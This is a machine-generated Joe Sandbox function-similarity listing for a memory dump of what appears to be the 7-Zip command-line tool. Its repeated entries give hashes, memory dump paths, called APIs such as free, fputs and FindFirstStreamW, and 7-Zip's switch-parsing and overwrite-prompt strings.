                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: 542bf3f330fecf80eaa0ec81e7d53865c449308f14702187d1a118dc28be755e
                                                                                                                                        • Instruction ID: 5c3419564c45226dac7ae57a0ded3aaad52b85919e0b283b044b09ebd49b61d5
                                                                                                                                        • Opcode Fuzzy Hash: 542bf3f330fecf80eaa0ec81e7d53865c449308f14702187d1a118dc28be755e
                                                                                                                                        • Instruction Fuzzy Hash: DEF0B7212669C0C5CB18FF33C46162E63A4FFC7F81F806461BB4E63712CE28C46ACA05
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$fputsmemset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 469995913-0
                                                                                                                                        • Opcode ID: d08ec6cc8013b459c16a183cb8820a8405a66458fcd2ec61ca7be2be00b49645
                                                                                                                                        • Instruction ID: 80960841322e521049ace1cdfa5911483410866bffb348b6f1fe761fbc2bdeed
                                                                                                                                        • Opcode Fuzzy Hash: d08ec6cc8013b459c16a183cb8820a8405a66458fcd2ec61ca7be2be00b49645
                                                                                                                                        • Instruction Fuzzy Hash: 2DF0AF22261580C1C718FF33D85152D2365EFC2F68B445261BF6D573ABCE24C4AACB44
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$memmovewcscmp
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3584677832-0
                                                                                                                                        • Opcode ID: 6651bb68e662bac90f1eb68cc59dab42f3d15c215dcf4cda3dc98e592289a540
                                                                                                                                        • Instruction ID: e83b3c0174612cc1fdb4a083cf722f64201eb61e7acbff6b6eaa6e770077c18f
                                                                                                                                        • Opcode Fuzzy Hash: 6651bb68e662bac90f1eb68cc59dab42f3d15c215dcf4cda3dc98e592289a540
                                                                                                                                        • Instruction Fuzzy Hash: 25511773221A86C6CF24EF16E49516D7761F394B94F948126EB5E0B728DF38D8E6CB00
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID: Incorrect switch postfix:$Multiple instances for switch:$Too long switch:$Too short switch:$Unknown switch:
                                                                                                                                        • API String ID: 1294909896-2104980125
                                                                                                                                        • Opcode ID: b5b2377c1078538503d45ef3bbf3395d3c0df3db1fbca7aa5af3743fb6efa1c1
                                                                                                                                        • Instruction ID: 47d91a13583a436dac3140590d5859a338de6e66bcbab551c1bc1a2481c96df9
                                                                                                                                        • Opcode Fuzzy Hash: b5b2377c1078538503d45ef3bbf3395d3c0df3db1fbca7aa5af3743fb6efa1c1
                                                                                                                                        • Instruction Fuzzy Hash: A0510462235AD1A6CF38EF25D5842ED3761F381394FD48222D68A47746EB78C9F9CB00
                                                                                                                                        APIs
                                                                                                                                        • free.MSVCRT ref: 002504EE
                                                                                                                                          • Part of subcall function 0024FEC8: _CxxThrowException.MSVCRT ref: 0024FF2F
                                                                                                                                          • Part of subcall function 0024FEC8: free.MSVCRT ref: 0024FFAE
                                                                                                                                          • Part of subcall function 0024FEC8: _CxxThrowException.MSVCRT ref: 0024FFD1
                                                                                                                                          • Part of subcall function 0024FEC8: _CxxThrowException.MSVCRT ref: 0024FFF7
                                                                                                                                          • Part of subcall function 0024FEC8: _CxxThrowException.MSVCRT ref: 0025002B
                                                                                                                                        • free.MSVCRT ref: 00250523
                                                                                                                                        • _CxxThrowException.MSVCRT ref: 00250564
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionThrow$free
                                                                                                                                        • String ID: Incorrect wildcard type marker$Too short switch
                                                                                                                                        • API String ID: 3129652135-1817034180
                                                                                                                                        • Opcode ID: f2458bf291f458b2712c5f00df2031021bba44effe0b8784fcef15973866768f
                                                                                                                                        • Instruction ID: 298b40e1cb1cecb6cd1c70006b8066dc26a3f54d2ec4a93882f1cf8243322319
                                                                                                                                        • Opcode Fuzzy Hash: f2458bf291f458b2712c5f00df2031021bba44effe0b8784fcef15973866768f
                                                                                                                                        • Instruction Fuzzy Hash: B351E2232286C5C5CB20DF16E8907AEBB70F785B95F948116EF8907B55DB78C89ACB04
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$memmove
                                                                                                                                        • String ID: #
                                                                                                                                        • API String ID: 1534225298-1885708031
                                                                                                                                        • Opcode ID: 88dd9615235185287fb0baae77512b6b30fd0ad49e52e1feae422806fc2f9e0a
                                                                                                                                        • Instruction ID: 859c74cca97b138aadb3537cd191634f9e10ce2df4e012e3fa4a65d644e4e476
                                                                                                                                        • Opcode Fuzzy Hash: 88dd9615235185287fb0baae77512b6b30fd0ad49e52e1feae422806fc2f9e0a
                                                                                                                                        • Instruction Fuzzy Hash: CF518126324B8482CB60CF26D49036E7765F7C9B94F588251EF9E43765DF38C869CB10
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memsetstrlen$fputs
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2256168112-2735817509
                                                                                                                                        • Opcode ID: ad0d7bef1b919bc72df3f5cae30fb1075d7da1c7e795fc3f1bc43048049e5982
                                                                                                                                        • Instruction ID: 7879f8348965422461ab35f41518fd23dc407dfd1d8f4bdb0bfc5d103269dab4
                                                                                                                                        • Opcode Fuzzy Hash: ad0d7bef1b919bc72df3f5cae30fb1075d7da1c7e795fc3f1bc43048049e5982
                                                                                                                                        • Instruction Fuzzy Hash: A141367A3297C1D5CB34FB26E4503AEA761F384B84F485522DE8E07749CE78C5A9CB00
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLastfree
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2167247754-0
                                                                                                                                        • Opcode ID: 20cadcee4a29e65714f589434cd172a3e6a1a379c9859cc67ae3c45b41779d1f
                                                                                                                                        • Instruction ID: add20add5b07e73069930f62632ca5d814c556deef63d0ff2068e92faf9f49a6
                                                                                                                                        • Opcode Fuzzy Hash: 20cadcee4a29e65714f589434cd172a3e6a1a379c9859cc67ae3c45b41779d1f
                                                                                                                                        • Instruction Fuzzy Hash: FF41AB3123858086CA24EF15E49136FB365F7D2760F900326EAED87A99DF74C99ADF04
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$FileMove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 288606353-0
                                                                                                                                        • Opcode ID: c934d79802b123a65afdecf3c3c141401825e728ddd7393a0425fdd743619d48
                                                                                                                                        • Instruction ID: 9552581797aea830826597c5632a95ce3846028c5889bfa19331b6e2ed732be6
                                                                                                                                        • Opcode Fuzzy Hash: c934d79802b123a65afdecf3c3c141401825e728ddd7393a0425fdd743619d48
                                                                                                                                        • Instruction Fuzzy Hash: 3A11272327496185CB24EE25E85426B5760DBC3BD0F449221FFAE57369DE28CC9ACB01
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0024794C: FindClose.KERNELBASE ref: 0024795E
                                                                                                                                        • SetLastError.KERNEL32 ref: 00247BAA
                                                                                                                                        • SetLastError.KERNEL32 ref: 00247BB9
                                                                                                                                        • FindFirstStreamW.KERNELBASE ref: 00247BDB
                                                                                                                                        • GetLastError.KERNEL32 ref: 00247BEA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$Find$CloseFirstStream
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4071060300-0
                                                                                                                                        • Opcode ID: a6e64fabe6673e363aad17d05dfc3ab5172c88e9485b2e4bf2568c0b8856aec2
                                                                                                                                        • Instruction ID: 723a376d191d2f79f3f904da9ef96895e024fcb93696aeb7ef18c76040515caf
                                                                                                                                        • Opcode Fuzzy Hash: a6e64fabe6673e363aad17d05dfc3ab5172c88e9485b2e4bf2568c0b8856aec2
                                                                                                                                        • Instruction Fuzzy Hash: 2421D632228B4082DA289F21E88436D6360FB8AB74F545321DEBA437E4DF3CC959C701
                                                                                                                                        APIs
                                                                                                                                        • free.MSVCRT ref: 00287DA9
                                                                                                                                        • free.MSVCRT ref: 00287DB2
                                                                                                                                        • free.MSVCRT ref: 00287DE5
                                                                                                                                        • free.MSVCRT ref: 00287DF2
                                                                                                                                        • free.MSVCRT ref: 00287DFB
                                                                                                                                          • Part of subcall function 002694A8: free.MSVCRT ref: 002694DB
                                                                                                                                          • Part of subcall function 002694A8: free.MSVCRT ref: 002694E3
                                                                                                                                          • Part of subcall function 002694A8: free.MSVCRT ref: 002694F0
                                                                                                                                          • Part of subcall function 002694A8: free.MSVCRT ref: 0026951C
                                                                                                                                          • Part of subcall function 002694A8: free.MSVCRT ref: 00269525
                                                                                                                                          • Part of subcall function 002694A8: free.MSVCRT ref: 0026952D
                                                                                                                                          • Part of subcall function 002694A8: free.MSVCRT ref: 0026953A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID: l}(
                                                                                                                                        • API String ID: 1294909896-296240151
                                                                                                                                        • Opcode ID: 782f6fd7dc41bf8ca513220e7cc76460a379d2f1bbd67af93ff481f02cf2e1fb
                                                                                                                                        • Instruction ID: 509db46d93c64ac8a68235123500d1c9e9da3e2de1d5fe1fcfe47ae704483cce
                                                                                                                                        • Opcode Fuzzy Hash: 782f6fd7dc41bf8ca513220e7cc76460a379d2f1bbd67af93ff481f02cf2e1fb
                                                                                                                                        • Instruction Fuzzy Hash: 59014423732990C9DB15BF26DC512682368EF45FA4F580121AF1D47356EF21C8A6C780
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        • (Y)es / (N)o / (A)lways / (S)kip all / A(u)to rename all / (Q)uit? , xrefs: 0028CD2A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: fputsfree
                                                                                                                                        • String ID: (Y)es / (N)o / (A)lways / (S)kip all / A(u)to rename all / (Q)uit?
                                                                                                                                        • API String ID: 2581285248-171671738
                                                                                                                                        • Opcode ID: 4b5025059e70d1de0ed5aeed492243599037d1a5b9a8e456c84aaac635c9e110
                                                                                                                                        • Instruction ID: 5febdc8d892269e432299cddd53e797ee56488b7f14f3f174211baba70e397bf
                                                                                                                                        • Opcode Fuzzy Hash: 4b5025059e70d1de0ed5aeed492243599037d1a5b9a8e456c84aaac635c9e110
                                                                                                                                        • Instruction Fuzzy Hash: 6B31D62A23A54583EB38BB04D4953692761E3847A5FA80123EB4E077E5CB78C8B59721
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1534225298-0
                                                                                                                                        • Opcode ID: e617d1b9eb2d61e76ec3f74afafcf8612c0e44b814c84aadc4ffb266d58f346a
                                                                                                                                        • Instruction ID: f31f93913d26828a6278e26ec8f82c0c91dd2476559dd548594fd070e4b81423
                                                                                                                                        • Opcode Fuzzy Hash: e617d1b9eb2d61e76ec3f74afafcf8612c0e44b814c84aadc4ffb266d58f346a
                                                                                                                                        • Instruction Fuzzy Hash: 8121B82223554091CE28EF25E85115EA720EBC17D0F941221FF5E877A9DF68C6EACF00
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: fputs$fputc
                                                                                                                                        • String ID: Time =
                                                                                                                                        • API String ID: 1185151155-458291097
                                                                                                                                        • Opcode ID: 125f46871291328263d9a45044a61c5585df70acc1ace0c9469d427cba69f483
                                                                                                                                        • Instruction ID: 3ec047f7ef094268678f5cc47fe705689b84890bdd94069283ec891d6e4f8781
                                                                                                                                        • Opcode Fuzzy Hash: 125f46871291328263d9a45044a61c5585df70acc1ace0c9469d427cba69f483
                                                                                                                                        • Instruction Fuzzy Hash: C021A299351A1186FA08BF1BEE5C35A5312A789FC5F18E036DE1E077A9DD3CC856C300
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSectionfreememmove$EnterExceptionLeaveThrow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 202075352-0
                                                                                                                                        • Opcode ID: c1de02b68f69ecc8d262e9e614d11b3dc807500ecf55debccae22723f41cb44a
                                                                                                                                        • Instruction ID: 3674e2f06cef35aea981926c0ef263cfbd9d53c42405b26ed175896f5e10237a
                                                                                                                                        • Opcode Fuzzy Hash: c1de02b68f69ecc8d262e9e614d11b3dc807500ecf55debccae22723f41cb44a
                                                                                                                                        • Instruction Fuzzy Hash: 1B21B077231690C7CBA4EF26D94566C7320F741BA5FA05326AE3D176A8DF35C896CB00
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressDiskFreeHandleModuleProcSpace
                                                                                                                                        • String ID: GetDiskFreeSpaceExW$kernel32.dll
                                                                                                                                        • API String ID: 1197914913-1127948838
                                                                                                                                        • Opcode ID: 91232d8e4c27da98ed619dc657d8975082bad2379c6f63f0bea740be7d830b66
                                                                                                                                        • Instruction ID: e67adf9cab725e9ab2648e26aebd5d98029adb04f166fae82a559dfeb465b152
                                                                                                                                        • Opcode Fuzzy Hash: 91232d8e4c27da98ed619dc657d8975082bad2379c6f63f0bea740be7d830b66
                                                                                                                                        • Instruction Fuzzy Hash: 25118937216B4696DB91CF55F484B9AB364F7A4B80F449022EF8E03728EF38C559CB00
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: e14598800cbc14b63090d73ae88cee87996ce6beccad5b2fb40a6b4c20696fd9
                                                                                                                                        • Instruction ID: 9f63aac58695752dfe69e6db9ddf95befb26ff8e4d968d542a08c5134a1e95b2
                                                                                                                                        • Opcode Fuzzy Hash: e14598800cbc14b63090d73ae88cee87996ce6beccad5b2fb40a6b4c20696fd9
                                                                                                                                        • Instruction Fuzzy Hash: 8C115E237229C4C5CB14EF36D8516692364EBC6FA8F584271AF6D577AACE20C89BC704
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: 5256221f962b44b0bae35b382dbe45db83359140e8ddd7a193f45a58e1d598c8
                                                                                                                                        • Instruction ID: cdf73e1edc2b80e1cf6f7ec07628cfc0c9f722481685e33d8e03ca04154586fe
                                                                                                                                        • Opcode Fuzzy Hash: 5256221f962b44b0bae35b382dbe45db83359140e8ddd7a193f45a58e1d598c8
                                                                                                                                        • Instruction Fuzzy Hash: 5D0182237219C0C98B25AE27D8511686329AF95FA47990225EF2D1B35ADE30C8E28740
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: a7c0efb318bb74a8d890d53e5fdb20e58762af4d74ce4d6a5953f08b0b6776bf
                                                                                                                                        • Instruction ID: ce71400a374397c8af527c85114bdd028f16791ed9db61f4193e07ce80f641ce
                                                                                                                                        • Opcode Fuzzy Hash: a7c0efb318bb74a8d890d53e5fdb20e58762af4d74ce4d6a5953f08b0b6776bf
                                                                                                                                        • Instruction Fuzzy Hash: 2C116523722980C5CB24AF36D85066D2354EF87FE4F598271AF6D5B396CE20C89AC710
                                                                                                                                        APIs
                                                                                                                                        • fputs.MSVCRT ref: 00286B7C
